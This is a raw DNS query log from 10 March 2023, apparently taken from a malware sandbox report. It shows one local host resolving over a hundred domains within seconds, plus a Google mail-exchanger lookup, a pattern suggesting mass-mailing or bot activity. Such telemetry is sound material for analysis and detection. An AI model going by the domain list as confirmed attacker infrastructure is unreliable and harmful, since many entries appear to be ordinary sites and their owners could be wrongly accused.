                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.963205099 CET192.168.2.68.8.8.80x5f87Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.975619078 CET192.168.2.68.8.8.80x773cStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.011153936 CET192.168.2.68.8.8.80x51adStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.039449930 CET192.168.2.68.8.8.80xe76aStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.039658070 CET192.168.2.68.8.8.80x1b0aStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.047740936 CET192.168.2.68.8.8.80xeb8aStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.058228970 CET192.168.2.68.8.8.80x1042Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.065733910 CET192.168.2.68.8.8.80xf678Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.075544119 CET192.168.2.68.8.8.80xbec8Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.078809977 CET192.168.2.68.8.8.80xa35cStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.082119942 CET192.168.2.68.8.8.80xb2c6Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.085486889 CET192.168.2.68.8.8.80x21a1Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.106875896 CET192.168.2.68.8.8.80xcaf1Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.127429962 CET192.168.2.68.8.8.80x1211Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.167138100 CET192.168.2.68.8.8.80x9ae4Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.196185112 CET192.168.2.68.8.8.80xb430Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.201342106 CET192.168.2.68.8.8.80x71e0Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.212739944 CET192.168.2.68.8.8.80x7c2cStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.213287115 CET192.168.2.68.8.8.80xf2d2Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.214601040 CET192.168.2.68.8.8.80x3e04Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.232147932 CET192.168.2.68.8.8.80xc973Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.252696037 CET192.168.2.68.8.8.80x5937Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.259742022 CET192.168.2.68.8.8.80x6cd6Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.268264055 CET192.168.2.68.8.8.80x5841Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.271063089 CET192.168.2.68.8.8.80xa0f6Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.273552895 CET192.168.2.68.8.8.80xb39eStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.275410891 CET192.168.2.68.8.8.80x9d23Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.297231913 CET192.168.2.68.8.8.80xf799Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.311639071 CET192.168.2.68.8.8.80xc8cfStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.316319942 CET192.168.2.68.8.8.80x2f1cStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.325889111 CET192.168.2.68.8.8.80x504eStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.327719927 CET192.168.2.68.8.8.80xcdf9Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.329910040 CET192.168.2.68.8.8.80xfce0Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.335664034 CET192.168.2.68.8.8.80x8cf7Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.352087975 CET192.168.2.68.8.8.80x31b2Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.420860052 CET192.168.2.68.8.8.80x2084Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.436742067 CET192.168.2.68.8.8.80x5279Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.463752031 CET192.168.2.68.8.8.80x4225Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.490928888 CET192.168.2.68.8.8.80x636bStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.497911930 CET192.168.2.68.8.8.80x4a35Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.499890089 CET192.168.2.68.8.8.80xd528Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.508732080 CET192.168.2.68.8.8.80x7cefStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.531517029 CET192.168.2.68.8.8.80x5771Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.593061924 CET192.168.2.68.8.8.80x33aeStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.607738018 CET192.168.2.68.8.8.80x8e6fStandard query (0)hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.621678114 CET192.168.2.68.8.8.80xcdcStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.621678114 CET192.168.2.68.8.8.80xfbadStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.621678114 CET192.168.2.68.8.8.80x16e3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.621678114 CET192.168.2.68.8.8.80x4f74Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.633143902 CET192.168.2.68.8.8.80x2913Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.636713982 CET192.168.2.68.8.8.80xe6eeStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.648417950 CET192.168.2.68.8.8.80x94e8Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.655306101 CET192.168.2.68.8.8.80x1e8Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.658551931 CET192.168.2.68.8.8.80x54d5Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.679140091 CET192.168.2.68.8.8.80x6b96Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.680608034 CET192.168.2.68.8.8.80xeedeStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.682817936 CET192.168.2.68.8.8.80x4352Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.689351082 CET192.168.2.68.8.8.80x7dc3Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.710572004 CET192.168.2.68.8.8.80xc0c6Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.720853090 CET192.168.2.68.8.8.80xe366Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.734956026 CET192.168.2.68.8.8.80x90b4Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.766555071 CET192.168.2.68.8.8.80x4cb1Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.789814949 CET192.168.2.68.8.8.80x559Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.810019016 CET192.168.2.68.8.8.80x8020Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.825644016 CET192.168.2.68.8.8.80xe99aStandard query (0)www.hyabmagneter.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.845669985 CET192.168.2.68.8.8.80xbf33Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.845669985 CET192.168.2.68.8.8.80x7632Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.886229992 CET192.168.2.68.8.8.80x1b37Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.889640093 CET192.168.2.68.8.8.80xae3eStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.891041994 CET192.168.2.68.8.8.80x21ceStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.910164118 CET192.168.2.68.8.8.80xa9d5Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.916158915 CET192.168.2.68.8.8.80x2a26Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.916158915 CET192.168.2.68.8.8.80x98c4Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.937108040 CET192.168.2.68.8.8.80xddffStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.940535069 CET192.168.2.68.8.8.80xf10Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.966382027 CET192.168.2.68.8.8.80x6bb7Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.973031998 CET192.168.2.68.8.8.80xb02aStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.984957933 CET192.168.2.68.8.8.80x3863Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.993144035 CET192.168.2.68.8.8.80xdc03Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.997046947 CET192.168.2.68.8.8.80x200dStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.043695927 CET192.168.2.68.8.8.80x63cdStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.092220068 CET192.168.2.68.8.8.80x201bStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.092432022 CET192.168.2.68.8.8.80xf71Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.125291109 CET192.168.2.68.8.8.80xd223Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.127227068 CET192.168.2.68.8.8.80xa775Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.137737036 CET192.168.2.68.8.8.80x53cbStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.162081957 CET192.168.2.68.8.8.80x6b7bStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.166738987 CET192.168.2.68.8.8.80xc135Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.192349911 CET192.168.2.68.8.8.80xe5d6Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.227976084 CET192.168.2.6198.32.64.120x77Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.251394033 CET192.168.2.68.8.8.80x2d3fStandard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.256571054 CET192.168.2.68.8.8.80x947bStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.293241978 CET192.168.2.68.8.8.80xff51Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.351505041 CET192.168.2.68.8.8.80x3badStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.369371891 CET192.168.2.68.8.8.80xadb3Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.377820969 CET192.168.2.68.8.8.80xd2d4Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.388221025 CET192.168.2.68.8.8.80xd7e1Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.396064997 CET192.168.2.68.8.8.80x913fStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.468564034 CET192.168.2.68.8.8.80xf08cStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.515124083 CET192.168.2.68.8.8.80x855fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.517493010 CET192.168.2.68.8.8.80x3a8cStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.563869953 CET192.168.2.68.8.8.80x97d2Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.576880932 CET192.168.2.68.8.8.80x6664Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.579752922 CET192.168.2.68.8.8.80x5925Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.582070112 CET192.168.2.68.8.8.80x84d8Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.584801912 CET192.168.2.68.8.8.80x98b3Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.621587992 CET192.168.2.68.8.8.80x44feStandard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.634994984 CET192.168.2.68.8.8.80x4f74Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.635056019 CET192.168.2.68.8.8.80x16e3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.645509005 CET192.168.2.68.8.8.80x4ce6Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.645509005 CET192.168.2.68.8.8.80x6c9cStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.668461084 CET192.168.2.68.8.8.80xdd91Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.701495886 CET192.168.2.68.8.8.80x5469Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.753945112 CET192.168.2.68.8.8.80x29d2Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.831198931 CET192.168.2.68.8.8.80x1d9cStandard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.883666039 CET192.168.2.68.8.8.80xa6d7Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.934200048 CET192.168.2.68.8.8.80x4623Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.946248055 CET192.168.2.68.8.8.80x12dbStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.993117094 CET192.168.2.68.8.8.80x5e9dStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.047873974 CET192.168.2.68.8.8.80x933Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.094757080 CET192.168.2.68.8.8.80xfeb2Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.116374969 CET192.168.2.68.8.8.80xcd5Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.164582968 CET192.168.2.68.8.8.80xe56aStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.169239044 CET192.168.2.68.8.8.80x124eStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.185009956 CET192.168.2.68.8.8.80x53a9Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.239327908 CET192.168.2.68.8.8.80xe942Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.245825052 CET192.168.2.68.8.8.80x5a96Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.329440117 CET192.168.2.68.8.8.80x8d19Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.334033966 CET192.168.2.68.8.8.80x49f8Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.354098082 CET192.168.2.68.8.8.80xbc85Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.356559038 CET192.168.2.68.8.8.80x8d77Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.357089043 CET192.168.2.68.8.8.80x135Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.364403963 CET192.168.2.68.8.8.80x5e4aStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.365910053 CET192.168.2.68.8.8.80x434aStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.383135080 CET192.168.2.68.8.8.80x2e06Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.389815092 CET192.168.2.68.8.8.80x3201Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.397572994 CET192.168.2.68.8.8.80x89bfStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.409831047 CET192.168.2.68.8.8.80x92b5Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.415630102 CET192.168.2.68.8.8.80xea49Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.431992054 CET192.168.2.68.8.8.80xed19Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.440618038 CET192.168.2.68.8.8.80xa552Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.466048002 CET192.168.2.68.8.8.80xfccdStandard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.472631931 CET192.168.2.68.8.8.80xeff5Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.481345892 CET192.168.2.68.8.8.80x339Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.481345892 CET192.168.2.68.8.8.80xd504Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.485924959 CET192.168.2.68.8.8.80x930cStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.491018057 CET192.168.2.68.8.8.80x855fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.499547005 CET192.168.2.68.8.8.80x90caStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.529567003 CET192.168.2.68.8.8.80xf8eaStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.543621063 CET192.168.2.68.8.8.80xe4d0Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.549216986 CET192.168.2.68.8.8.80x2396Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.577589035 CET192.168.2.68.8.8.80x5ed5Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.581393957 CET192.168.2.68.8.8.80xefccStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.589061022 CET192.168.2.68.8.8.80xd16aStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.610189915 CET192.168.2.68.8.8.80xcd4dStandard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.631674051 CET192.168.2.68.8.8.80xba71Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.694077969 CET192.168.2.68.8.8.80x4ce6Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.764534950 CET192.168.2.68.8.8.80xffcfStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.769016981 CET192.168.2.68.8.8.80x8620Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.815679073 CET192.168.2.68.8.8.80x704cStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.840842962 CET192.168.2.68.8.8.80x5abStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.860773087 CET192.168.2.68.8.8.80xc92Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.891037941 CET192.168.2.68.8.8.80x8cd2Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.937689066 CET192.168.2.68.8.8.80x3c7Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.959140062 CET192.168.2.68.8.8.80xdce4Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.031497002 CET192.168.2.68.8.8.80x850dStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.032740116 CET192.168.2.68.8.8.80xafb7Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.084588051 CET192.168.2.68.8.8.80xd47cStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.087090969 CET192.168.2.68.8.8.80xca70Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.091408968 CET192.168.2.68.8.8.80xab6Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.117594957 CET192.168.2.68.8.8.80x11d3Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.122955084 CET192.168.2.68.8.8.80x53d8Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.129040956 CET192.168.2.68.8.8.80x9e8Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.201524019 CET192.168.2.68.8.8.80x10d0Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.263796091 CET192.168.2.68.8.8.80x9030Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.291960001 CET192.168.2.68.8.8.80x76faStandard query (0)scintel.comA (IP address)IN (0x0001)false
